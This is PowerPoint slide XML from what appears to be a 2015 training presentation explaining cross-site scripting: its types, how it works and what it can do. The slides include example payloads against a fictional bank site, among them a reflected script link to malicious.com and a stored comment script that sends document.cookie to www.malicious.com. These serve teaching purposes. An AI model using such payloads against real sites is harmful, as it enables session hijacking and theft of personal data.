            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581563" y="3393169"/>
            <a:ext cx="3735637" cy="6533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65602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>60% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web applications are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to XSS (2013)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7" y="4377877"/>
            <a:ext cx="3276600" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567221" y="4589364"/>
            <a:ext cx="3735637" cy="6533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65602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>#3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP TOP-10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(2013)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571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  <p:bldP spid="15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 smtClean="0"/>
              <a:t>Please welcome – XSS!</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="40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3CC9F-2F88-42CB-B8FF-E7C70FCEAFF1}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>26.02.2015</a:t>
            </a:fld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3</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO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1563" y="1480782"/>
            <a:ext cx="7545637" cy="1414818"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>What is XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> against users of vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webapp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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531563" y="2650617"/>
            <a:ext cx="7944018" cy="103381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65602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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Goal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xecute code (JavaScript) in victim’s browser in context attacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webapp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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3343" y="3680971"/>
            <a:ext cx="1362075" cy="19081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4" y="1994227"/>
            <a:ext cx="6623652" cy="2147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25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60113" y="189082"/>
            <a:ext cx="8100000" cy="912448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" dirty="0" smtClean="0"/>
              <a:t>How it WORKS???</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="40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3CC9F-2F88-42CB-B8FF-E7C70FCEAFF1}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>26.02.2015</a:t>
            </a:fld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smtClean="0"/>
              <a:t>/      </a:t>
            </a:r>
            <a:fld id="{D6197CBF-E606-4ECF-84A1-A353AC3F4555}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO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663" y="1208856"/>
            <a:ext cx="1153344" cy="11533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563" y="1208856"/>
            <a:ext cx="1158240" cy="14325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5638" y="4674632"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Down Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4662055" y="2641416"/>
            <a:ext cx="304800" cy="1663884"/>
          </a:xfrm>
          <a:prstGeom prst="down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 rot="10800000">
            <a:off x="4238660" y="2641416"/>
            <a:ext cx="342901" cy="1663884"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 43939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1566758" y="1674110"/>
            <a:ext cx="2514600" cy="502051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Link with hidden code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Right Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1524000" y="1201189"/>
            <a:ext cx="2548859" cy="446856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20999997" lon="0" rev="10799999"/>
              </a:camera>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Personal Data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129850" y="4305300"/>
            <a:ext cx="2903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WWW.SUPERBANK.ORG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832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XSS Types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563" y="1480782"/>
            <a:ext cx="8100000" cy="1262418"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>By attacking vector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reflected or passive XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Type 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1" smtClean="0"/>
              <a:t>tored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or active XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Type 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM Based XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Type 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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 , </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509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APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW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59116C4F-506C-422F-99BF-DA58E0F7A7E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1563" y="3191989"/>
            <a:ext cx="8100000" cy="126241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65602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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By injection channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser errors/bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lack of input validation filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ubstitution of page encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413417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Reflected XSS</a:t>
            </a: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 smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509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49690" y="6440676"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW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59116C4F-506C-422F-99BF-DA58E0F7A7E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31563" y="1478753"/>
            <a:ext cx="2745037" cy="2718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WWW.SUPERBANK.ORG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563" y="1925136"/>
            <a:ext cx="1158240" cy="1432560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>
            <a:off x="1828800" y="2641416"/>
            <a:ext cx="4724400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4140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2204352"/>
            <a:ext cx="1153344" cy="11533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15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7053672" y="3581400"/>
            <a:ext cx="0" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4140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6172200" y="5334000"/>
            <a:ext cx="1991103" cy="7620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Login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*******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977933"/>
            <a:ext cx="438150" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="2090382"/>
            <a:ext cx="3581400" cy="55103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65602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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800" dirty="0" smtClean="0"/>
              <a:t>Hi Mr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1" smtClean="0"/>
              <a:t>Pibody</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
              <a:t>Please check our monthly report on our site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0043C8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.superbank.org/rep_page.aspx?mothly=&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0043C8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0043C8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“http://malicious.com/sc.js”&gt;&lt;/script&gt;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3897350" y="4350545"/>
            <a:ext cx="1991103" cy="3810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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.malicious.com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4892902" y="3112499"/>
            <a:ext cx="1660298" cy="11340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7239000" y="3581400"/>
            <a:ext cx="0" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4140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897350" y="3599817"/>
            <a:ext cx="1052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Victim loads </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>from site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61244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6" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="22" grpId="0" animBg="1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Stored XSS</a:t>
            </a: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 , </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509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APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW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59116C4F-506C-422F-99BF-DA58E0F7A7EE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2236" y="1785528"/>
            <a:ext cx="1153344" cy="11533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ounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3586011" y="1981200"/>
            <a:ext cx="1991103" cy="7620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Login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*******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402" y="1645920"/>
            <a:ext cx="1158240" cy="1432560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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205601" y="1459119"/>
            <a:ext cx="2751921" cy="2718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WWW.SUPERBANK.ORG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187645" y="5334000"/>
            <a:ext cx="1991103" cy="3810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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.malicious.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684642" y="2362200"/>
            <a:ext cx="1820558" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4140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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5638800" y="2362200"/>
            <a:ext cx="1683436" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4140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4183196" y="2819400"/>
            <a:ext cx="3284404" cy="24384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638800" y="1784475"/>
            <a:ext cx="17796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Access to report with </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>employees “comments”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1684642" y="1840119"/>
            <a:ext cx="1719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Inject active content </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>to report’s “comments”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685800" y="3145651"/>
            <a:ext cx="31662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 smtClean="0"/>
              <a:t>Iteresting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> report!!!&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>(‘&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>=“http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>://www.malicious.com/evilsmile.gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>?’ + </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>+’”/&gt;’)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19429570">
            <a:off x="3756248" y="3785809"/>
            <a:ext cx="38571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Victim unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> sends cookie to www.malicious.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5635128" y="5334000"/>
            <a:ext cx="3329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Attacker can now work on behalf victim </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>using session ID from cookie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0075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animBg="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="31" grpId="0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DOM Based XSS</a:t>
            </a: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 , </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509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APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW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59116C4F-506C-422F-99BF-DA58E0F7A7E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1563" y="1371600"/>
            <a:ext cx="8100000" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Webpages modifies the DOM (Document Object Model)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Hard to find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563" y="2443409"/>
            <a:ext cx="4075000" cy="3609491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4794692" y="2485210"/>
            <a:ext cx="3623037" cy="9144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&lt;body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     &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>);&lt;/script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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>body&gt;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674" y="2135632"/>
            <a:ext cx="2088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Simple HTML DOM tree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5075983" y="2117416"/>
            <a:ext cx="30604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Example of simple vulnerable HTML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5802142" y="3827420"/>
            <a:ext cx="16081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How to exploit???</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687772" y="4186881"/>
            <a:ext cx="3836871" cy="546606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/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>://site.com/test.html#&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>script&gt;alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>’);&lt;/script&gt;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51032" y="5520758"/>
            <a:ext cx="1510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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DOM  XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>WiKi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187795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8" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0" animBg="1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How XSS can be used</a:t>
            </a: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smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/26/2015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APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW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59116C4F-506C-422F-99BF-DA58E0F7A7E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1563" y="1480782"/>
            <a:ext cx="8100000" cy="126241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Stealing COOKIES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HighJacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Personal data stealing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unauthorized access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webapp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reputation loss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31563" y="2745289"/>
            <a:ext cx="8100000" cy="988511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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Stealing forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Personal data stealing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unauthorized access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webapp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reputation loss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31563" y="3733801"/>
            <a:ext cx="8100000" cy="6858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65602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>-attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reputation loss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31563" y="4419601"/>
            <a:ext cx="8100000" cy="988511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734" algn="l" defTabSz="9141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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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11" indent="-228547" algn="l" defTabSz="9141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XSS-Worms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personal data stealing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
